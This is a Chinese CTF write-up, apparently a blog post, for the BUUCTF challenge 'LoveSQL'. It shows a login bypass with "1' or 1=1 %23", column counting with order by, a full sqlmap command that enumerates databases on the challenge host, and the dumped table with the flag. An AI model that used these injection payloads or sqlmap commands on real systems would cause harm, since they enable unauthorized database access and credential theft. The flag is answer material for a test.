当前位置: 首页 > news >正文

[极客大挑战 2019]LoveSQL

和前面ezsql登录界面一样的

让我们试一下上一次的wp username=1' or 1=1 %23&password=1​

嗯~拿到账号密码,提交一下(不对?)

看来是要爆库了,打乱语句结构测一下 username=1' or 1=1'&password=1​

ok,说明溢出确实是从这里发生的,而且可以通过 %23​ 注释的方式绕过密码验证(这里直接用 #​ 是不行的)

并且可以看出来后半段是and连接的,我们手注的内容大概在 '​ %23​ 之间

测了一下 username=1' order by 1 %23&password=1​ 和 username=1' order by 4 %23&password=1​

这里测一下就知道最多 order by 3​

哈哈,我不注啦,sqlmap 助我!

爆库指令如下

 python sqlmap.py -u "http://fa09dbb5-2afc-485e-bac3-d90cd99ad83e.node5.buuoj.cn:81/check.php?username=1&password=12" -p "username" --random-agent --prefix="1'" --suffix="%23" --skip="password" --dbs

这里注出来flag在密码段,结果如下:

[doge] 让我狗一波,翻一下出题人心情

1.一场大雨(歌词?)
2. 表哥dddd好吗
3. cl4y(出题人?)
4. 第2块腹肌
5. 第3块腹肌
6. 第4块腹肌
7. 第5块腹肌
8. 第6块腹肌
9. 第7块腹肌
10. 第8块腹肌
11. flag{a1d58558-e4ec-4d47-98e4-a033843efb41}
12. 管理者jin想要一个女朋友(?)
13. linux创始人
14. Syc三大黑客
15. 我太难了
16. 严师傅的猫薄荷

哈哈笑死

http://www.dtcms.com/a/390768.html

相关文章:

  • Excel和WPS表格中选中全部空单元格并输入相同内容
  • 日志易制造业安全UEBA解决方案
  • Java 将 HTML 转换为 Excel:实用指南
  • MySQL索引篇---数据结构的选择
  • 【STM32 CubeMX + Keil】 中断、NVIC 、EXTI
  • BIGO一面面试总结
  • Ansible-fetch模块
  • DevExpress WPF中文教程:DataGrid - 服务器数据和大型数据源
  • Vue项目不同页面显示不同的title
  • NW820NW825美光固态闪存NW829NW832
  • aosp13/14/15/16如何实现窗口局部区域高斯模糊毛玻璃效果及Winscope原生重大bug发现
  • Java微服务架构设计模式精解
  • 设计模式面试之单例模式常问知识点
  • 深入解析 MySQL 元数据锁 (MDL) 与 SHOW PROCESSLIST 实战
  • 能不能写一个可以在linux使用的类nano编辑器
  • Rocky10 使用kubeadm部署K8s v1.34 一主两从
  • 深入理解Buffer:数据世界的“蓄水池“
  • 通义万相开源 Wan2.2-S2V-14B,实现图片+音频生成电影级数字人视频
  • windows c++环境 使用VScdoe配置opencv
  • JVM(四)-- 对象的实例化内存布局和直接内存
  • G1垃圾回收器的优势
  • 内存分配策略
  • Python采集Tik Tok视频详情,Tik TokAPI接口(json数据返回)
  • 实时通信技术大比拼:长轮询、短轮询、WebSocket 与 SSE 深度解析及实战指南
  • ICML 2025|图像如何与激光雷达对齐并互补?迈向协调的多模态3D全景分割
  • 基于Web的3D工程应用图形引擎——HOOPS Communicator技术解析
  • 【每日一问】运放的失调电压是什么?对于电路有何影响?
  • 【轨物方案】轨物科技新型储能管理系统:以AIoT技术驱动储能资产全生命周期价值最大化
  • 线性回归 vs 逻辑回归:从原理到实战的全面对比
  • HashMap的底层原理